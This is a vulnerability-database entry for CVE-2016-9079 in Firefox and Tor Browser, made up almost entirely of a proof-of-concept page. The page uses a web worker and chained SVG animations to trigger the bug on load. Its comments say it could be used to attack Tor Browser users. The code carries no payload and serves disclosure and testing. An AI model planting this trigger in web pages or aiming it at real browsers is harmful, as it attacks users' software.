New Firefox/Tor Browser 0-day vulnerability (CVE-2016-9079)

2016-11-30T00:00:00
ID SSV:92560
Type seebug
Reporter Root
Modified 2016-11-30T00:00:00

Description

No description provided by source.

                                        
                                            
                                                <!-- 相关版本poc可在此下载 https://bugzilla.mozilla.org/show_bug.cgi?id=1321066 -->
<!-- 来自 [tor-talk] 可在此下载:https://lists.torproject.org/pipermail/tor-talk/2016-November/042639.html,可被用来攻击利用 Tor 浏览器使用的 Firefox版本 -->
<script>
var worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage("one");postMessage("two");};');
worker.postMessage("zero");
var svgns = 'http://www.w3.org/2000/svg';
worker.onmessage = function(e) {containerA.pauseAnimations();}
var craftDOM = function()
{
  containerA = document.createElementNS(svgns, 'svg')
  var containerB = document.createElementNS(svgns, 'svg');
  animateX = document.createElementNS(svgns, 'animate')
  var animateA = document.createElementNS(svgns, 'animate')
  var animateB = document.createElementNS(svgns, 'animate')
  var animateC = document.createElementNS(svgns, 'animate')
  var idA = "ia";
  var idC = "ic";
  animateA.setAttribute('id', idA);
  animateA.setAttribute('end', '50s');
  animateB.setAttribute('begin', '60s');
  animateB.setAttribute('end', idC + '.end');
  animateC.setAttribute('id', idC);
  animateC.setAttribute('end', idA + '.end');
  containerA.appendChild(animateX)
  containerA.appendChild(animateA)
  containerA.appendChild(animateB)
  containerB.appendChild(animateC)
  document.body.appendChild(containerA);
  document.body.appendChild(containerB);
}
window.onload = craftDOM;
</script>